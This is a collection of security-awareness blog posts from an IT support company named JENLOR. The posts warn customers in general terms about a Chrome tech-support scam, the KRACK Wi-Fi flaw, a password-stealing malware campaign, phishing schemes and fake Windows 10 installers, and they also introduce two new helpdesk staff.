New Tech Support Scam Attacking Chrome Users
A new security breach scam has panicked many Google Chrome users. The new scam freezes Chrome and convinces users into believing that their network security has been compromised. But, the catch is that following the instructions listed will lead to the actual security breach.
The scam starts by displaying an error message about a security breach that leaves the browser inaccessible and advises the end user to dial the listed phone number to fix the error. While on the other end of that phone number is the scammer posing as an Apple or Microsoft technician awaiting to obtain your credit card and other personal information.
The fix however is quite easy. Windows users need to simply open Task Manager (press ctrl + shift + esc) and select the browser and click end task. MacOS users just need to simply wait until a system message prompts them to close the unresponsive Chrome tab.
If a problem surfaces call our service team at 412-220-9330 x2 and we will help you through any security issues that lurk on the web.
Over the past few months, JENLOR has expanded our support team with new members. We would like to take this time to formally introduce you to our newest hires Douglas Foster and Chad Walker, who joined Chris Schoen’s Helpdesk team. Both of them add more depth and coverage to our customer base. We look forward to their contributions!
Douglas has been in the IT field for 4+ years with a passion around cyber security. He will be responsible for fielding inbound requests such as Helpdesk support, troubleshooting, and pre-staging customer equipment. Douglas relies on an easy-going, methodical approach to his work. Douglas is a very friendly and positive person when interacting with his coworkers and customers.
Chad has also been in the IT field for 4+ years, starting his career as an intern and eventually growing into a Senior Specialist before joining JENLOR. Chad has extensive experience in technical support, networking, and customer service. Chad will be counted upon for fast and reliable support to our customer base. Chad is a high-energy person, who is able to work quickly towards resolution, with a strong technical mind and continues to absorb new information.
A security protocol at the heart of most modern Wi-Fi devices, including computers, phones, and routers, has been broken, putting almost every wireless-enabled device at risk of attack.
The bug, known as “KRACK” for Key Reinstallation Attack, exposes a fundamental flaw in WPA2, a common protocol used in securing most modern wireless networks. Mathy Vanhoef, a computer security academic, who found the flaw, said the weakness lies in the protocol’s four-way handshake, which securely allows new devices with a pre-shared password to join the network.
That weakness can, at its worst, allow an attacker to decrypt network traffic from a WPA2-enabled device, hijack connections, and inject content into the traffic stream.
802.11r is a standard for improving the roaming experience of wireless client devices as they physically move about a given network and, by virtue of distance and signal strength, automatically associate and disassociate to various access points (AP). Associating to a new AP takes time, thanks to necessary authentication. FT speeds up the authentication and association process for roaming clients – helping to protect against packet loss and poor performance in applications like VoIP calls or streaming content.
Essentially, an attacker can expose sensitive information exchanged between a client device and a wireless access point by taking advantage of the fact that replayed frames aren’t accounted for when establishing a connection using FT. This allows an attacker to replay data sent to an AP, including sensitive encryption key data – enabling that attacker to decrypt/forge wireless frames. In all cases, an attacker needs to be in close proximity to the AP or client under attack.
Only unpatched wireless networks that have enabled 802.11r functionality are at risk. ALL JENLOR customers who are using Cisco Meraki are up to date and not at risk. We are working with other vendors for updates and patches. A full list of patches can be found here.
If you have any questions or concerns please reach out to email@example.com or contact us directly at 412-220-9330
For more information, please see the links below:
The malware uses Microsoft Intermediate Language payload that is compiled to steal passwords from the victim’s system, browser and FTP software, according to an Oct. 4 Zscaler blog post.
“The delivery method for this malware is the VBScript, which downloads the payload from the compromised website, and then downloads a decoy document to lead the victim to believe that the downloaded files are legitimate,” researchers said in the post.
The decoy appears to be a “public service” message from the Pennsylvania Department of Public Welfare that includes spam mitigation instructions.
The VBScript downloads the decoy, terminates the Microsoft Word process, downloads the payload via a PowerShell command, and removes the documents recovery entries of Microsoft Word though registry entries.
Researchers said the malware performs various password stealing activities such as checking for antivirus and looking into the directories and files from which it will steal information once executed.
“The most interesting function of this malware is that it also behaves like a file stealer, as it checks for interesting strings in the system with enumeration of various files and folders and uploads to the malware’s C&C once it grabs the sensitive information,” the post said.
The malware seeks to steal passwords from Armory Wallet, Chrome, Firsefox, CuteFTP, FileZilla, Putty, Electrum bitcoin wallet and WinSCP Passwords.
DON’T OPEN THAT GOOGLE DOC – Unless you’re positive it’s legit.
There’s a brand new Phishing scam making it’s way around the internet. If you receive a Google Doc link in your inbox today, examine it carefully before you click to open, even if it looks like it came from someone you trust. You’ve heard it so many times “think before you click” but it really could save you a whole lot of hassle.
The importance of this phish is not how it spread, but rather how it didn’t use malware or fake websites tricking users to give up passwords. Phishers can use real Google accounts and develop third-party plugins that can interact with Google services, so they can lure victims in through perfect looking Google web pages.
Safety first, resist the urge to click remains the best first line of defense out there. Be aware of inconsistencies or suspicious content in an email and listening to those instincts is important. Sometimes a second look is all it takes to realize that a coworker wouldn’t send a Google Doc to the entire company out of the blue.
If you feel you have been subject to this scam, please reach out to our service team for support.
As of the new year, there are some new phishing/spam campaigns that are on the horizon. This one is important to read and understand.
These campaigns are not targeted towards the most sophisticated users, they are going after the average user who may not think twice about entering credentials to unlock a PDF. With this in mind, it puts you at risk when you enter your information and the document is opened, anything you input is transmitted to the spammer and it allows them access to steal your email credentials. Workstations that use the Adobe PDF reader are cautioned via a warning dialogue, however, Windows 10 by default uses the Edge browser and when Edge opens the PDF, unlike with Adobe, NO warning message is presented.
Be wary of emails from domains that don’t match the content and look for other signs that give these away as scams. Be alert and keep your “human firewall” on their toes with Security top of mind.
As always, if you think you have been subject to this type of scam, please call us for assistance.
Hello All –
We’ve recently seen an influx of SPAM – specifically related to Wire Transfers. These attempts are being made by Spammers and Spoofers.
If you receive anything regarding a request for any type of monetary transfer, even though this may be typical for your company, double check the authenticity of the request, i.e. phone or verbal communication.
As always, if you are suspicious of any email requests, that are not typical for your organization, please forward the email to JENLOR’s service group at firstname.lastname@example.org. If you have immediate questions, please call service at 412-220-9330 x 2.
Please forward this communication to your end users – your best defense is education.
While this all sounds great, we do not recommend that you install this preview. As many of us have experienced, early versions of software updates tend to be unstable, and may cause instability with some of the current software you are running. If this Windows update is something you want to do, please call us, we can help you navigate the process easier and work through any potential software conflicts you may have.
Hello All –
In an effort to continually keep our customers educated on new and emerging computer threats, we are sharing the latest information we’ve received about new malware that is targeting soon-to-be Windows 10 users.
Please be watchful for an email purporting to be from Microsoft with an attachment; the email verbiage claims to include an installer granting users “quick” access to the new Microsoft OS. The attached executable file is malware similar to the Cryptolocker virus – “ransomware” that encrypts your files, locking the owner out.
As always, if you are suspicious of an email attachment, please forward the email to JENLOR’s service group at email@example.com. If you have immediate questions, please call service at:
412-220-9330 x 2.
Please forward this communication to your end users – your best defense is education.